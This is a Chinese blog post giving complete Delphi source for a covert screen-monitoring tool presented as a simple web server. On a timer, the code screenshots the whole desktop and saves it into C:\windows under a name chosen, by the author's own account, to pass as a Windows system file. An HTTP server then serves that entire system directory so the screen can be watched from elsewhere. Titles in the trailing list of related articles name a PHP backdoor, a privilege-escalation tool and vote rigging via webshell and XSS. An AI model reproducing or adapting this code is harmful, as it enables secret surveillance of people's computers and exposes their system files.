http://www.birdol.com/cainiaobiancheng/238.html

delphi之猥琐的webserver实现

菜鸟编程  十五楼的鸟儿  7年前 (2009-01-01)  1266浏览  0评论

简单的webserver而已,不过实现的功能有些猥琐,可以在远程监控你的桌面一举一动~~
代码如下:
[code=delphi]unit Main;

interface

uses
 Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
 ActnList, StdCtrls, IdComponent, IdTCPServer, IdHTTPServer, Buttons,
 ComCtrls, IdGlobal, IdBaseComponent, IdThreadMgr, IdThreadMgrDefault, syncobjs,
 IdThreadMgrPool, ExtCtrls, IdIntercept, IdIOHandlerSocket,
 IdCustomHTTPServer, idSocketHandle,shellapi, Winsock, jpeg;
{偶承认这里是乱来的,我也不知道都use了啥,填了一堆...-_-!}
type
 TfmHTTPServerMain = class(TForm)
   HTTPServer: TIdHTTPServer;
   edPort: TEdit;
   cbActive: TCheckBox;
   edRoot: TEdit;
   LabelRoot: TLabel;
   Label1: TLabel;
   Button1: TButton;
   Label2: TLabel;
   Timer1: TTimer;
   procedure acActivateExecute(Sender: TObject);
   procedure HTTPServerCommandGet(AThread: TIdPeerThread;
     RequestInfo: TIdHTTPRequestInfo; ResponseInfo: TIdHTTPResponseInfo);
   procedure FormCreate(Sender: TObject);
   procedure FormDestroy(Sender: TObject);
   procedure Button1Click(Sender: TObject);
   procedure Timer1Timer(Sender: TObject);

private
   UILock: TCriticalSection;
   { Private declarations }
 public
   { Public declarations }
   EnableLog: boolean;
   MIMEMap: TIdMIMETable;
 end;

var
 fmHTTPServerMain: TfmHTTPServerMain;
   jiance:Boolean;

implementation

uses FileCtrl, IdStack;

{$R *.DFM}

function GetLocalIP: string;
type
  TaPInAddr = array[0..255] of PInAddr;
  PaPInAddr = ^TaPInAddr;
var
  phe: PHostEnt;
  pptr: PaPInAddr;
  Buffer: array[0..63] of char;
  i: integer;
  GInitData: TWSADATA;
begin
  wsastartup($101, GInitData);
  result := '';
  GetHostName(Buffer, SizeOf(Buffer));
  phe := GetHostByName(buffer);
  if not assigned(phe) then
    exit;
  pptr := PaPInAddr(Phe^.h_addr_list);
  i := 0;
  while pptr^[I] <> nil do
  begin
    result := {Result +}StrPas(inet_ntoa(pptr^[I]^)) + ',';
    inc(i);
  end;
  Delete(Result, Length(Result), 1);
  wsacleanup;
end;{获取IP的函数}

procedure TfmHTTPServerMain.acActivateExecute(Sender: TObject);
var
 Binding : TIdSocketHandle;

begin

if jiance  then
 begin
   cbActive.Checked:=True;
   jiance:=False;
 end
  else
  begin
   cbActive.Checked:= False;
   jiance:=True;
  end;
 if not HTTPServer.Active then
 begin
   HTTPServer.Bindings.Clear;
   Binding := HTTPServer.Bindings.Add;
   Binding.Port := StrToIntDef(edPort.text, 80);
   Binding.IP := GetLocalIP;
    caption := '已启动';
 end;

if not DirectoryExists(edRoot.text) then
 begin
   cbActive.Checked:= False;
 end
 else
 begin
   if cbActive.Checked then
   begin
     try
       HTTPServer.Active := true;
     except
       on e: exception do
       begin
         cbActive.Checked := False;
       end;
     end;
   end
   else
   begin
     HTTPServer.Active := false;
      caption := '未启动';
     // SSL stuff
     HTTPServer.Intercept := nil;
   end;
 end;
 edPort.Enabled := not cbActive.Checked;
 edRoot.Enabled := not cbActive.Checked;
end;

procedure TfmHTTPServerMain.HTTPServerCommandGet(AThread: TIdPeerThread;
 RequestInfo: TIdHTTPRequestInfo; ResponseInfo: TIdHTTPResponseInfo);

var
 LocalDoc: string;
 ByteSent: Cardinal;

begin
   LocalDoc := ExpandFilename(edRoot.text + RequestInfo.Document);
   if not FileExists(LocalDoc) then
   begin
     LocalDoc := ExpandFileName(LocalDoc);
   end;
   if FileExists(LocalDoc) then
 begin
       if AnsiSameText(RequestInfo.Command, 'HEAD') then
       begin
          ResponseInfo.ResponseNo := 200;
          ResponseInfo.ContentText := '

'+''+'';
       end
       else
       begin
         ByteSent := HTTPServer.ServeFile(AThread, ResponseInfo, LocalDoc);
        end;
 end
 else
   begin
     ResponseInfo.ResponseNo := 404;
     ResponseInfo.ContentText := '

'+''+'';
{edPort.Text是你设置的端口,windows目录下是有FeatherTexture.bmp的,为了掩人耳目,弄个差不多的FeatherTexture.jpeg~}
 end;
{这个webserver貌似还有些问题,结构是我从indy的demo上扒下来的,貌似每次返回的都是404代码,所以偶为了防止出问题,采用了上面那段代码,就算是404,404页面也是有图片的,嘿嘿~~}
end;

procedure TfmHTTPServerMain.FormCreate(Sender: TObject);
begin
 jiance:=True;
 UILock := TCriticalSection.Create;
 MIMEMap := TIdMIMETable.Create(true);
   edRoot.text := 'C:\windows';
 if HTTPServer.active then  caption := '已启动' else caption := '未启动';
 Label2.Caption:= '当前IP:'+GetLocalIP;
end;

procedure TfmHTTPServerMain.FormDestroy(Sender: TObject);
begin
 MIMEMap.Free;
 UILock.Free;
end;

procedure TfmHTTPServerMain.Button1Click(Sender: TObject);
begin
ShellExecute(handle,nil,pchar('http://'+GetLocalIP+':'+edPort.Text),nil,nil,sw_shownormal);
end;

procedure TfmHTTPServerMain.Timer1Timer(Sender: TObject);
var
Fullscreen:Tbitmap;
FullscreenCanvas:TCanvas;
dc:HDC;
MyJPEG : TJPEGImage;
begin
Fullscreen:=TBitmap.Create;
Fullscreen.Width:=screen.width;
Fullscreen.Height:=screen.Height;
DC:=GetDC(0);
FullscreenCanvas:=TCanvas.Create;
FullscreenCanvas.Handle:=DC;
Fullscreen.Canvas.CopyRect(Rect(0,0,screen.Width,screen.Height),
fullscreenCanvas,Rect(0,0,Screen.Width,Screen.Height));
FullscreenCanvas.Free;
ReleaseDC(0,DC);
myjpeg:= TJPEGImage.Create;
myjpeg.Assign(Fullscreen);
myjpeg.CompressionQuality:=100; //压缩比例,100是最清晰状态。
myjpeg.Compress;
try
myjpeg.SaveToFile('c:\windows\FeatherTexture.JPEG');//保存路径,可以随便选,但是一定要和上面的webserver路径吻合。
myjpeg.Free;
fullscreen.free;
except
end;
end;

end.

[/code]
截个图瞧瞧:

转载请注明:鸟儿博客 » delphi之猥琐的webserver实现

delphi之猥琐的webserver实现的更多相关文章

  1. PHP后门新玩法:一款猥琐的PHP后门分析

    0x00 背景 近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就 ...

  2. Finding Palindromes - 猥琐的字符串(Manacher+trie)

    题目大意:有 N 个字符串,所有的字符串长度不超过 200W 任意俩俩字符串可以自由组合,问组合的字符串是回文串的个数有多少个?   分析:这是一个相当猥琐的字符串处理,因为没有说单个的字符串最少多长 ...

  3. 猥琐的wordpress后门分享

    https://www.t00ls.net/thread-37312-1-1.html 一个可以自动调用管理员帐号登录wordpress后台的方法. <?php require('../../. ...

  4. webshell + xss 猥琐刷某投票

    团队成员发来一个投票的地址,需要撸某某网站的一个某某投票,果断看了下,ip限制了,看到post 数据包 额 随便找个大流量shell post 数据 Js代码代码 <script type=&q ...

  5. Potato(邪恶土豆)–windows全版本猥琐提权

    工作原理: Potato利用已知的Windows中的问题,以获得本地权限提升,即NTLM中继(特别是基于HTTP > SMB中继)和NBNS欺骗.使用下面介绍的技术,它有可能为一个非特权用户获得 ...

  6. 猥琐百度杯猥琐CTF

    其实不难,但是作为我这个代码菜鸡+脑洞菜鸡+黑阔菜鸡而言确实挺难. 题目源码: <?php error_reporting(0); session_start(); require('./fla ...

  7. CTF之文件包含的猥琐思路

    From: i春秋 百度杯”CTF 一: <?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello' ...

  8. 1010 Radix:猥琐的测试数据

    谨以此题纪念边界测试数据浪费了我多少时间:https://pintia.cn/problem-sets/994805342720868352/problems/994805507225665536 # ...

  9. 猥琐发育,3月份Java干货已到达战场!

    时间真的过得很快,又是月底了,又到了我们总结这个月干货的时候了.3月份这个月我们都带来了哪些干货呢?我们一起回顾一下. 坑爹,手机端链接点不开,请切换到电脑端或者关注我们的微信公众号进行阅读. 扫描关 ...

随机推荐

  1. 项目被os x占用

    xattr -d com.apple.FinderInfo 空格后拖入项目回车就行了

  2. API网关spring cloud gateway和负载均衡框架ribbon实战

    通常我们如果有一个服务,会部署到多台服务器上,这些微服务如果都暴露给客户,是非常难以管理的,我们系统需要有一个唯一的出口,API网关是一个服务,是系统的唯一出口.API网关封装了系统内部的微服务,为客 ...

  3. Python实现视频片头和片尾添加

    import imageio imageio.plugins.ffmpeg.download() from datetime import datetime import os from moviep ...

  4. Python之文件和异常IO

    文件和异常 读写文本文件 读取文本文件时,需要在使用open函数时指定好带路径的文件名(可以使用相对路径或绝对路径)并将文件模式设置为'r'(如果不指定,默认值也是'r'),然后通过encoding参 ...

  5. 不定参数(rest 参数 ...)

    不定参数 如何实现不定参数 使用过 underscore.js 的人,肯定都使用过以下几个方法: _.without(array, *values) //返回一个删除所有values值后的array副 ...

  6. body传参?parameter传参?Request Payload?Query String Parameter?

    今天,是有委屈的一天:今天,是有小情绪的一天.所以,我们要对今天进行小结,跟它做一个了断! 今天,后端来一个接口,告诉我"要用post请求,parameter形式传参".over. ...

  7. Python 中三大框架各自的应用场景??

    django:主要是用来搞快速开发的,他的亮点就是快速开发,节约成本,正常的并发量不过 10000,如果要实现高并发的话,就要对 django 进行二次开发,比如把整个笨重的框架给拆掉,自己写 soc ...

  8. Python 批量文件下载

    python文件 批量下载 .图片批量下载 ,批量请求.爬虫 #==================================================================== ...

  9. Elasticsearch7.X 入门学习第四课笔记---- Search API之(Request Body Search 和DSL简介)

    原文:Elasticsearch7.X 入门学习第四课笔记---- Search API之(Request Body Search 和DSL简介) 版权声明:本文为博主原创文章,遵循CC 4.0 BY ...

  10. C# 给DataTable去重

    using System; using System.Data; namespace DelegateTest { public class Program { public static void ...